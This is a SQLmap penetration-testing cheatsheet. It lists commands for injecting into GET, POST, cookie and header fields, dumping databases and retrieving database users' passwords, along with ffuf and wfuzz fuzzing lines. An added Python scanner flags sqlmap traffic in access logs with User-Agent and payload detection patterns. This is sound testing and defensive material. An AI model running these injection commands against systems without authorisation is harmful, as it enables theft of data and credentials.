
SQLmap Cheatsheet

Info

This note is still in development.

Generic Arguments


-u "<URL>" 
-p "<PARAM TO TEST>" 
--user-agent=SQLMAP 
--random-agent 
--threads=10 
--risk=3 #Maximum risk level (payloads that may modify data)
--level=5 #Maximum level (tests every parameter, including cookies, User-Agent, Referer and Host)
--dbms="<KNOWN DB TECH>" 
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

Retrieve Information


  • Internal

    --current-user #Get current user
    --is-dba #Check if current user is Admin
    --hostname #Get hostname
    --users #Get usernames of DB
    --passwords #Get passwords of users in DB
    --privileges #Get privileges
    

  • DB Data

    --all #Retrieve everything
    --dump #Dump DBMS database table entries
    --dbs #Names of the available databases
    --tables #Tables of a database ( -D <DB NAME> )
    --columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
    -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
    

Injection


## GET Request Injection
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

## POST Request Injection
sqlmap -u "http://example.com" --data "username=*&password=*"

# SQLmap POST Injection
sqlmap -u "http(s)://<ip_addr>:<port>/<directory>" --method POST --data "field1=*&field2=*&field3=*" -p "field3"

## Header & Other HTTP Method Injection

# Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"

# Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

# PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection point is wherever the '*' marker is placed (parameter, body field, cookie or header)
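The options above (the `sqlmap` default User-Agent, `--random-agent`, `--threads`, the UNION/boolean/time techniques, and the GET, POST, cookie and header injection points) all leave traces that a defender can look for. The following is an added example, not part of the original cheatsheet, that scans constructed Apache combined-format access-log lines for sqlmap-style activity: a User-Agent containing "sqlmap", and union-, boolean- and time-based payload patterns in the decoded query string. The log lines, IPs and version string are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Apache "combined" format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2024:12:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2024:12:00:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.9 - - [10/May/2024:12:00:02 +0000] "GET /index.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.7 - - [10/May/2024:12:00:03 +0000] "GET /index.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 480 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.7 - - [10/May/2024:12:00:03 +0000] "GET /index.php?id=1%27%20AND%20SLEEP%285%29-- HTTP/1.1" 200 480 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.3 - - [10/May/2024:12:00:04 +0000] "GET /about.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Parser for the Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Payload signatures, applied to the URL-decoded query string.
# Names follow sqlmap's own technique letters (U, B, T in "BEUSTQ").
PAYLOAD_PATTERNS = {
    "union-based": re.compile(r"\bUNION\b.*\bSELECT\b", re.IGNORECASE | re.DOTALL),
    "boolean-based": re.compile(r"\b(AND|OR)\b\s+\d+\s*=\s*\d+", re.IGNORECASE),
    "time-based": re.compile(
        r"\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bWAITFOR\s+DELAY\b|\bPG_SLEEP\s*\(", re.IGNORECASE
    ),
}

# sqlmap's default User-Agent starts with "sqlmap/". --random-agent replaces it,
# which is why the payload checks above exist alongside this one.
UA_RE = re.compile(r"sqlmap", re.IGNORECASE)


def classify_line(line):
    """Return (client_ip, [reasons]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    reasons = []
    if UA_RE.search(m.group("ua")):
        reasons.append("sqlmap-user-agent")
    query = unquote_plus(urlsplit(m.group("path")).query)
    for name, pattern in PAYLOAD_PATTERNS.items():
        if pattern.search(query):
            reasons.append(name)
    return m.group("ip"), reasons


def scan_log(text):
    """Aggregate flagged requests per client IP.

    Returns {ip: {"hits": flagged_request_count, "reasons": [sorted unique reasons]}}
    and omits clients with no flagged requests.
    """
    findings = defaultdict(lambda: {"hits": 0, "reasons": set()})
    for line in text.splitlines():
        result = classify_line(line)
        if result is None:
            continue
        ip, reasons = result
        if reasons:
            findings[ip]["hits"] += 1
            findings[ip]["reasons"].update(reasons)
    return {
        ip: {"hits": f["hits"], "reasons": sorted(f["reasons"])}
        for ip, f in findings.items()
    }


if __name__ == "__main__":
    for ip, f in scan_log(SAMPLE_LOG).items():
        print(f"{ip}: {f['hits']} flagged request(s): {', '.join(f['reasons'])}")
```

Two caveats follow directly from the cheatsheet. A web server's access log only records the request line, so payloads placed in a POST body, a cookie or a header (the `--data`, `--cookie` and `--headers` cases above) never appear in it; the same `classify_line` logic has to be fed from a WAF or request-body log to see those. And `--union-char` only changes the filler value in the UNION payload, so the `UNION ... SELECT` pattern still matches; what does defeat the User-Agent check is `--random-agent`, which is why the payload patterns and a per-client hit count matter more than the UA string alone.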

Examples


# Enumeration
sudo ffuf -u http(s)://<ip_addr>:<port>/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Use Burp Suite to see which fields are being sent

# SQLmap POST Injection
sqlmap -u "http(s)://<ip_addr>:<port>/<directory>" --method POST --random-agent --data "field1=*&field2=*&field3=*" -p "field3"
# Fuzzing GET Parameter
wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -u "$URL/index.php?id=FUZZ"

# Fuzzing POST Parameter
wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -d "id=FUZZ" -u "$URL/index.php"